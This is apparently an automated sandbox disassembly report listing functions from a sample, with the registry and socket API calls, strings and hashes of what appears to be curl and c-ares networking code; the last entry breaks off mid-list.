Function 0052A440 Relevance: 44.8, APIs: 17, Strings: 8, Instructions: 1066registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0052AA19
RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0052AA4C
RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0052AA97
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0052AAE9
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0052AB30
RegCloseKey.KERNELBASE(?), ref: 0052AB6A
RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0052AB82
RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0052AC46
RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0052AD0A
RegEnumKeyExA.KERNELBASE ref: 0052AD8D
RegCloseKey.KERNELBASE(?), ref: 0052ADD9
RegEnumKeyExA.KERNELBASE ref: 0052AE08
RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0052AE2A
RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0052AE54
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0052AF63
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0052AFB2
RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0052B072

Strings

SearchList, xrefs: 0052AA46, 0052AA91, 0052ABA7, 0052ABEA, 0052AE4E, 0052AE9D
System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces, xrefs: 0052AD00
Software\Policies\Microsoft\System\DNSClient, xrefs: 0052AC3C
System\CurrentControlSet\Services\Tcpip\Parameters, xrefs: 0052AA0F
PrimaryDNSSuffix, xrefs: 0052AC6B, 0052ACAE
Software\Policies\Microsoft\Windows NT\DNSClient, xrefs: 0052AB78
Domain, xrefs: 0052AAE3, 0052AB2A, 0052AF5D, 0052AFAC
DhcpDomain, xrefs: 0052B06C, 0052B0BB

Memory Dump Source

Source File: 00000000.00000002.2327276994.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.2327241909.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.0000000000B47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328032889.0000000000B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000B4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000CD3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000EC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000ED0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328460874.0000000000EDF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328624385.0000000001095000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328655720.0000000001097000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_OoYYtngD7d.jbxd

Similarity

API ID: QueryValue$Open$CloseEnum
String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
API String ID: 4217438148-1047472027
Opcode ID: a977465b764dc036699ad625e6e978ff8ef2fd4f32c69fed06297d7592e561b5
Instruction ID: 9ee11054897320bcffa9bba406c17345ca321db13090d388465a1e1da4365047
Opcode Fuzzy Hash: a977465b764dc036699ad625e6e978ff8ef2fd4f32c69fed06297d7592e561b5
Instruction Fuzzy Hash: C0729FB1604311ABE7209F24DC86B6BBBE8BF86700F145828F985D72E1E775E944CB53

Function 004AA550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 004AA831

Strings

Trying [%s]:%d..., xrefs: 004AA689
Local port: %hu, xrefs: 004AAF28
cf_socket_open() -> %d, fd=%d, xrefs: 004AA796
@, xrefs: 004AA8F4
sa_addr inet_ntop() failed with errno %d: %s, xrefs: 004AA6CE
@, xrefs: 004AAC42
cf-socket.c, xrefs: 004AA5CD, 004AA735
Name '%s' family %i resolved to '%s' family %i, xrefs: 004AADAC
Couldn't bind to '%s' with errno %d: %s, xrefs: 004AAE1F
Local Interface %s is ip %s using address family %i, xrefs: 004AAE60
Couldn't bind to interface '%s' with errno %d: %s, xrefs: 004AAD0A
bind failed with errno %d: %s, xrefs: 004AB080
Bind to local port %d failed, trying next, xrefs: 004AAFE5
Trying %s:%d..., xrefs: 004AA7C2, 004AA7DE
Could not set TCP_NODELAY: %s, xrefs: 004AA871

Memory Dump Source

Source File: 00000000.00000002.2327276994.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.2327241909.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.0000000000B47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328032889.0000000000B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000B4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000CD3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000EC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000ED0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328460874.0000000000EDF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328624385.0000000001095000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328655720.0000000001097000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_OoYYtngD7d.jbxd

Similarity

API ID: setsockopt
String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
API String ID: 3981526788-2373386790
Opcode ID: ba19bd1f2a284ddc46d01533450014a514025d41d8f4f4744159fd70956ac36d
Instruction ID: 54e3d1328271b522defad64bf9726b96c8cd7ef537e4961b407eeecf7fed8194
Opcode Fuzzy Hash: ba19bd1f2a284ddc46d01533450014a514025d41d8f4f4744159fd70956ac36d
Instruction Fuzzy Hash: 4F622871508341ABE720CF14C846BABB3E4FFA2318F04491EF98897292E775E855CB97

Function 00539740 Relevance: 16.5, APIs: 3, Strings: 6, Instructions: 743
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00539946
RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00539974
RegCloseKey.KERNELBASE(?), ref: 0053998B

Strings

System\CurrentControlSet\Services\Tcpip\Parameters, xrefs: 0053993C
DatabasePath, xrefs: 0053996B
#, xrefs: 00539B9D
\hos, xrefs: 0053999A
#, xrefs: 00539A3F
CARES_HOSTS, xrefs: 00539788

Memory Dump Source

Source File: 00000000.00000002.2327276994.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.2327241909.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.0000000000B47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328032889.0000000000B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000B4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000CD3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000EC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000ED0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328460874.0000000000EDF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328624385.0000000001095000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328655720.0000000001097000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_OoYYtngD7d.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos
API String ID: 3677997916-615551945
Opcode ID: 5b63d9d62678353e5e8d96fcaefcc687d7e550a1437b0907cf2b341e546bac27
Instruction ID: 6fc47cda2264f7d3006855232973da2ca4a816300d75f0bd8bd71646036cccbf
Opcode Fuzzy Hash: 5b63d9d62678353e5e8d96fcaefcc687d7e550a1437b0907cf2b341e546bac27
Instruction Fuzzy Hash: B93274F5904202ABEB11AB24AC47A1B7FE4BF95314F084838F94997262FB71ED14D793

Function 004A8B50 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 269
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32(?,?,00000001), ref: 004A8C30
SleepEx.KERNELBASE(00000000,00000000), ref: 004A8CF3

Strings

not connected yet, xrefs: 004A8BDC
local address %s port %d..., xrefs: 004A8C7F
cf-socket.c, xrefs: 004A8EDF
connected, xrefs: 004A8DA7
connect to %s port %u from %s port %d failed: %s, xrefs: 004A8E78

Memory Dump Source

Source File: 00000000.00000002.2327276994.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.2327241909.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.0000000000B47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328032889.0000000000B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000B4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000CD3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000EC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000ED0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328460874.0000000000EDF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328624385.0000000001095000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328655720.0000000001097000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_OoYYtngD7d.jbxd

Similarity

API ID: Sleepconnect
String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
API String ID: 238548546-879669977
Opcode ID: 8bb584c6161f1488e0f26e60bf271c16a99b904af2bea31d72923128e5e6a76d
Instruction ID: 700a223be56455b86a44640f43a3d3914fbe161aacc1d2dc93cc379051278265
Opcode Fuzzy Hash: 8bb584c6161f1488e0f26e60bf271c16a99b904af2bea31d72923128e5e6a76d
Instruction Fuzzy Hash: 4FB19E70604305AFD710DF24C885BA7B7A0EF66318F04892EF8598B3D2DB78E855CB66

Function 00472F17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 144
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE ref: 00472FED
RegEnumKeyExA.KERNELBASE ref: 004731A5

Strings

d, xrefs: 00472FA0

Memory Dump Source

Source File: 00000000.00000002.2327276994.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.2327241909.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.0000000000B47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328032889.0000000000B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000B4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000CD3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000EC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000ED0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328460874.0000000000EDF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328624385.0000000001095000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328655720.0000000001097000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_OoYYtngD7d.jbxd

Similarity

API ID: EnumOpen
String ID: d
API String ID: 3231578192-2564639436
Opcode ID: 0b3958f21c255bec7e1ceb43918be85884fc4bb18ba7daa4ed4041ab5674c724
Instruction ID: d50ebb3e7d23a300d7972b12405f149783412cd834c14444867d270c4a7afac9
Opcode Fuzzy Hash: 0b3958f21c255bec7e1ceb43918be85884fc4bb18ba7daa4ed4041ab5674c724
Instruction Fuzzy Hash: 4C7181B49043199FDB10DF69D58479EBBF0FF84308F108869E99897351E7749A88CF92

Function 004776A0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 73
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32(multi.c,?,?,?,N=G,00000000,?,?,004807BF), ref: 004776EB

Strings

multi.c, xrefs: 004776DD, 004776E9
N=G, xrefs: 004776A3
send, xrefs: 0047770B, 0047772A
SEND %s:%d send(%lu) = %ld, xrefs: 004776F8
LIMIT %s:%d %s reached memlimit, xrefs: 00477712, 00477731

Memory Dump Source

Source File: 00000000.00000002.2327276994.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.2327241909.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.0000000000B47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328032889.0000000000B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000B4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000CD3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000EC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000ED0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328460874.0000000000EDF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328624385.0000000001095000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328655720.0000000001097000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_OoYYtngD7d.jbxd

Similarity

API ID: send
String ID: LIMIT %s:%d %s reached memlimit$N=G$SEND %s:%d send(%lu) = %ld$multi.c$send
API String ID: 2809346765-821333934
Opcode ID: bdd923f0cb8660745854847bc806e48769534a753cebb87753f95eeaa61d2cb5
Instruction ID: 33cef550813037a655ab84b8475976b07daaeb95ab78838ce343767a05902903
Opcode Fuzzy Hash: bdd923f0cb8660745854847bc806e48769534a753cebb87753f95eeaa61d2cb5
Instruction Fuzzy Hash: 5D1150B56093447BD1219B169C9AE773B9CEBC2F2CF450A1EFC0C57342D665AD00C2B1

Function 004A9290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 004A935D
setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 004A9389

Strings

send(len=%zu) -> %d, err=%d, xrefs: 004A9447
cf-socket.c, xrefs: 004A92CF
Send failure: %s, xrefs: 004A93FB

Memory Dump Source

Source File: 00000000.00000002.2327276994.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.2327241909.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.0000000000B47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328032889.0000000000B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000B4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000CD3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000EC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000ED0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328460874.0000000000EDF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328624385.0000000001095000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328655720.0000000001097000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_OoYYtngD7d.jbxd

Similarity

API ID: Ioctlsetsockopt
String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
API String ID: 1903391676-2691795271
Opcode ID: 13e6c1d74b4497d8b02f06ff1cdf626567195e93f59076249b7f468236b26845
Instruction ID: 2ef02b6f02a006a7fcde3d8a6a836883b8a6a0c852a62b68cbdf3d7dacacc45f
Opcode Fuzzy Hash: 13e6c1d74b4497d8b02f06ff1cdf626567195e93f59076249b7f468236b26845
Instruction Fuzzy Hash: 3951D174604305ABEB10DF24C881FAAB7A5FF99318F14852AFD488B382E734ED51C755

Function 00477770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

recv.WS2_32(?,?,?,?), ref: 004777BB

Strings

RECV %s:%d recv(%lu) = %ld, xrefs: 004777C8
recv, xrefs: 004777DB, 004777FA
LIMIT %s:%d %s reached memlimit, xrefs: 004777E2, 00477801

Memory Dump Source

Source File: 00000000.00000002.2327276994.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.2327241909.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.0000000000B47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328032889.0000000000B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000B4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000CD3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000EC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000ED0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328460874.0000000000EDF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328624385.0000000001095000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328655720.0000000001097000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_OoYYtngD7d.jbxd

Similarity

API ID: recv
String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
API String ID: 1507349165-640788491
Opcode ID: 343580312305b5f9d46f848f913e7d4b97204ff575778ccf6d1fbe8ddeb645d2
Instruction ID: dad0555fd70b980ccb37e18da8ced4e77a932a64b18911edbfcde368fd9e670b
Opcode Fuzzy Hash: 343580312305b5f9d46f848f913e7d4b97204ff575778ccf6d1fbe8ddeb645d2
Instruction Fuzzy Hash: 78112BB9A083447BD120D7159C4AE673B9CDBC6B6CF45465EB80C53352D655AD0081B6

Function 004775E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32(?,?,?), ref: 00477619

Strings

socket, xrefs: 00477643, 00477662
FD %s:%d socket() = %d, xrefs: 0047762E
LIMIT %s:%d %s reached memlimit, xrefs: 0047764A, 00477669

Memory Dump Source

Source File: 00000000.00000002.2327276994.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.2327241909.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.0000000000B47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328032889.0000000000B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000B4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000CD3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000EC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000ED0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328460874.0000000000EDF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328624385.0000000001095000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328655720.0000000001097000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_OoYYtngD7d.jbxd

Similarity

API ID: socket
String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
API String ID: 98920635-842387772
Opcode ID: 68906eaa752d69478a50d4e2889e4348aa2ec0e677d987f5aec96045db0eaa48
Instruction ID: 1495e046cf0b186e8d1ba06a979c41345b00c143c7f38cc847f87788df2fad75
Opcode Fuzzy Hash: 68906eaa752d69478a50d4e2889e4348aa2ec0e677d987f5aec96045db0eaa48
Instruction Fuzzy Hash: FE112C7660025177DA21572A6C16FDB3B88DBC2B38F45491AF818933D2D715CD50C2E1

Function 004AA150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getsockname.WS2_32(?,?,00000080), ref: 004AA1C7

Strings

ssloc inet_ntop() failed with errno %d: %s, xrefs: 004AA23B
getsockname() failed with errno %d: %s, xrefs: 004AA1F0

Memory Dump Source

Source File: 00000000.00000002.2327276994.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.2327241909.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.0000000000B47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327276994.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328032889.0000000000B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000B4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000CD3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2328059935.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
